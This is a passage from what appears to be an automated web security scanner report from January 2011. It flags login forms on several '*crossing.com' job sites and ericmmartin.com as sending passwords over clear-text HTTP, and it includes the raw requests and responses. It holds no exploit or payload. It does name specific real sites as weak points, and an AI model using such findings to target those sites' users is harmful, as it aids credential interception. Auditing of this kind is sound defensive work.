Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 122922

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.ecommercecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.38. http://www.editingcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.editingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.editingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:47 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9718dh1vf5ni8ge10ijt7ncv93; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114100

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.editingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.39. http://www.educationcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.educationcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.educationcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:49 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=cv80umbmrn1jnbk6im77qu8nf1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:49 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 112625

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.educationcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.40. http://www.employmentcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.employmentcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.employmentcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:55 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ep2g7l3vs5a5pub16rrihs9jp3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:55 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103823

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.employmentcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.41. http://www.energycrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.energycrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.energycrossing.com/index.php

The form contains the following password field:
clslogin_password

Request

GET / HTTP/1.1
Host: www.energycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:59 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=i3h90hnvarkvvcfesqumj8vhf0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:59 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117799

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.energycrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.42. http://www.engineeringcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.engineeringcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.engineeringcrossing.com/index.php

The form contains the following password field:
clslogin_password

Request

GET / HTTP/1.1
Host: www.engineeringcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:03 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=u76d1au7ldsubj9jq17ge4lui3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:03 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 136413

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.engineeringcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.43. http://www.entrylevelcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.entrylevelcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.entrylevelcrossing.com/index.php

The form contains the following password field:
clslogin_password

Request

GET / HTTP/1.1
Host: www.entrylevelcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:04 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=u5gd5nbnop8c3jphrctn63t6f2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:04 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 149370

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.entrylevelcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.44. http://www.environmentalcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.environmentalcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.environmentalcrossing.com/index.php

The form contains the following password field:
clslogin_password

Request

GET / HTTP/1.1
Host: www.environmentalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:07 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=dq6vrirkde3igauguqgj7gjfh0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:07 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103899

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.environmentalcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.45. http://www.environmentalsafetyhealthcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.environmentalsafetyhealthcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.environmentalsafetyhealthcrossing.com/index.php

The form contains the following password field:
clslogin_password

Request

GET / HTTP/1.1
Host: www.environmentalsafetyhealthcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:13 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=kinch90afsop9ot95vej0stu73; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109299

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.environmentalsafetyhealthcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.46. http://www.ericmmartin.com/projects/simplemodal/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ericmmartin.com
Path:   /projects/simplemodal/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.ericmmartin.com/wordpress/wp-login.php

The form contains the following password field:
pwd

Request

GET /projects/simplemodal/ HTTP/1.1
Host: www.ericmmartin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:09:51 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Pingback: http://www.ericmmartin.com/wordpress/xmlrpc.php
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Fri, 21 Jan 2011 20:01:28 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34881


<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<title>SimpleModal / Eric Martin / ericmmartin.com</title>

<meta name="author" content="Eric Ma
...[SNIP]...
<div id="simplemodal-login-form" style="display:none">
   <form name="loginform" id="loginform" action="http://www.ericmmartin.com/wordpress/wp-login.php" method="post">
       <div class="title">
...[SNIP]...
<br />
           <input type="password" name="pwd" class="user_pass input" value="" size="20" tabindex="20" /></label>
...[SNIP]...

6.47. http://www.erpcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.erpcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.erpcrossing.com/index.php

The form contains the following password field:
clslogin_password

Request

GET / HTTP/1.1
Host: www.erpcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:16 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=f4lggi6e8n8h982dg6rfsp1522; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:16 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116111

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.erpcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.48. http://www.execcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.execcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.execcrossing.com/index.php

The form contains the following password field:
clslogin_password

Request

GET / HTTP/1.1
Host: www.execcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:21 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=sedi04t58r2ut89pg242blpvl1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:21 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 130348

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.execcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.49. http://www.facilitiescrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.facilitiescrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.facilitiescrossing.com/index.php

The form contains the following password field:
clslogin_password

Request

GET / HTTP/1.1
Host: www.facilitiescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:50 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=nc6a2h1em6s3batcv6fjsg17b1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:50 GMT
